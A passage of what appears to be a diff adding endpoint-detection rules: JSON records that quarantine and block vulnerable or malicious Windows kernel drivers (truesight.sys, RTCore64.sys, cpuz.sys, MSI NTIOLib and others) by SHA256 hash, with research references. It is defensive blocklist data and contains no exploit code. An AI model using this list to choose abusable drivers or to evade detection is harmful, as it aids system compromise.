"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488240Z", + "creation_date": "2026-03-23T11:45:31.488242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a76f8d98f689166abfb86c50ff83f3f8693404f7c457de48d04cb6ccd4887ef5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "029772cd-05a0-58d0-9ad1-dd415300042b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488925Z", + "creation_date": "2026-03-23T11:45:31.488927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.488932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2e64bd2c50f6032e070776b3687f7e3cb0a5c02c10ca54176ce7877c5bdf9c9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "029f8029-e5b3-59c0-b1f0-57af43acad0e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144700Z", + "creation_date": "2026-03-23T11:45:31.144702Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144708Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "552ed099bb06f83c3a41a8963556800ec5a579be4f51bd5df9b945520a584d4c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02adc0e1-b524-5bab-acad-928666181a01", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160952Z", + "creation_date": "2026-03-23T11:45:31.160954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160960Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31ec72cdcf6dd4eb8642f8546cb9995a5f5c7d0afd5b89fad961697676e6ca8a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02beeddf-cf27-5c70-b160-e06e0539a9ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500064Z", + "creation_date": "2026-03-23T11:45:31.500067Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500075Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "77641e765a14d98a2f06cb05400eddb086d49bdff7d809f193266a2ba0516113", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02c3a900-6337-515e-ba02-ec79052cb575", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826901Z", + "creation_date": "2026-03-23T11:45:30.826904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826909Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8291a0fdd796f6fe82fccbe4c7ee4dcc7d8e4927d40abe18ebcc61a9cb16fb1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02c7fc85-ee32-5340-b2c7-3717749fedbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477519Z", + "creation_date": "2026-03-23T11:45:30.477522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477532Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16b591cf5dc1e7282fdb25e45497fe3efc8095cbe31c05f6d97c5221a9a547e1", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02cda463-0ae0-5464-ab49-618f1c7f918f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479862Z", + "creation_date": "2026-03-23T11:45:30.479864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479881Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0dcdbdc62949c981c4fc04ccea64be008676d23506fc05637d9686151a4b77f", + "comment": "Vulnerable NVIDIA Kernel Driver (aka nvoclock.sys) 
[https://github.com/zer0condition/NVDrv] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02d2dd45-fc87-5295-ab1f-6c182b37e5b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148700Z", + "creation_date": "2026-03-23T11:45:31.148703Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6ff9674ce64230ea72ef866594640115a7560d2ce969f24ff15e1cd818c5cb6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02d36425-67b5-56c6-b285-9ea08ee85b87", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615118Z", + "creation_date": "2026-03-23T11:45:29.615120Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7893307df2fdde25371645a924f0333e1b2de31b6bc839d8e2a908d7830c6504", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02db34b9-8176-56cc-9398-df47a51ebb2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155258Z", + "creation_date": "2026-03-23T11:45:31.155260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155266Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06bb219d68e32c270b3cbaae0fd053c39febb0b6ae6f72df347e49c29c5183f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02dc9788-6aeb-5161-9bad-2c97e18b50ee", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825448Z", + "creation_date": "2026-03-23T11:45:30.825450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c9f9f49d85991f002fdeb6cf8424e5db99edc6e1ce3b9e28841307a497312dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02e43f36-0536-5d7c-8043-8dfeb7088a50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829934Z", + "creation_date": "2026-03-23T11:45:30.829936Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.829941Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f6b1aeec2dcdc6bca062aebf012cc897e26615be007059dd098780b85977c91", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02f123f7-7e0c-520c-a29c-c61b3cd2753f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472501Z", + "creation_date": "2026-03-23T11:45:30.472505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73c03b01d5d1eb03ec5cb5a443714b12fa095cc4b09ddc34671a92117ae4bb3a", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02f59a82-cfbf-5a27-9e20-0fb3c73f1515", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147147Z", + "creation_date": "2026-03-23T11:45:31.147149Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147155Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "637f36fae18a32aac7c284249963f36ac67c049cb557541d3b24eabe2c77c6cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02fc09c8-a6ee-5c7f-a170-0f8d528f0bb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147042Z", + "creation_date": "2026-03-23T11:45:31.147044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b2f91e1d9b4eaaf2037d10896d9a151fa1403c3c3efc03f6863a519b6d0bb4b8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03197381-af7f-5ca5-8b90-947f8dedf145", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983086Z", + "creation_date": "2026-03-23T11:45:29.983088Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983094Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3390919bb28d5c36cc348f9ef23be5fa49bfd81263eb7740826e4437cbe904cd", + "comment": "Vulnerable Kernel Driver (aka nstrwsk.sys) [https://www.loldrivers.io/drivers/e9b099f6-8a12-46f0-a540-40e88cf0ce17/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "032b3a6e-5b72-588d-8eb6-ff6f05a5e666", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475798Z", + "creation_date": "2026-03-23T11:45:30.475801Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475810Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b975bb2aeb265f1e943a9ca501fc76e2b4514e874ca449c0e59fb36bacf17159", + "comment": "Malicious Kernel Driver (aka 6771b13a53b9c7449d4891e427735ea2.sys) [https://www.loldrivers.io/drivers/ddca6daf-4932-4e82-ad3c-d92d47632ea4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03451eda-7d3f-5e9c-b42f-189566de53ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460822Z", + "creation_date": "2026-03-23T11:45:30.460826Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460834Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6a2b1937fa277526a1e0ca9f9b32f85ab9cb7cb1a32250dd9c607e93fc2924f", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03462b63-efc5-5618-a732-13c397e187fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835591Z", + "creation_date": "2026-03-23T11:45:30.835593Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835599Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac8b97d5da80ca7b0f325d0b9d28a1a97a21725ae81c8504cc50be50a3a00382", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03488896-4b3f-54c7-861a-da48d7fe4ee6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147376Z", + "creation_date": "2026-03-23T11:45:31.147378Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f5bdeecabdf1c33c6f1263bc9a2f6e816eefb117b4d19dabd86743398abbce9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0360a8bb-1dd0-5e2f-9658-aebdb564b83f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476280Z", + "creation_date": "2026-03-23T11:45:30.476283Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476291Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "834a3d755b5ae798561f8e5fbb18cf28dfcae7a111dc6a03967888e9d10f6d78", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0377aacc-9f0a-5094-a490-ef43f4ae4061", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499243Z", + "creation_date": "2026-03-23T11:45:31.499246Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a9a17986c8d36a2244538222be04858b5a3f23eef5f6484b6923e225874d564", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "037e14f8-b96f-50a6-9a57-2a4b0a01ef90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452882Z", + "creation_date": "2026-03-23T11:45:30.452886Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec1307356828426d60eab78ffb5fc48a06a389dea6e7cc13621f1fa82858a613", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0398198d-ce88-5c5e-8b75-41a6e6640cbc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977018Z", + "creation_date": "2026-03-23T11:45:29.977020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977026Z", + "rule_level": null, 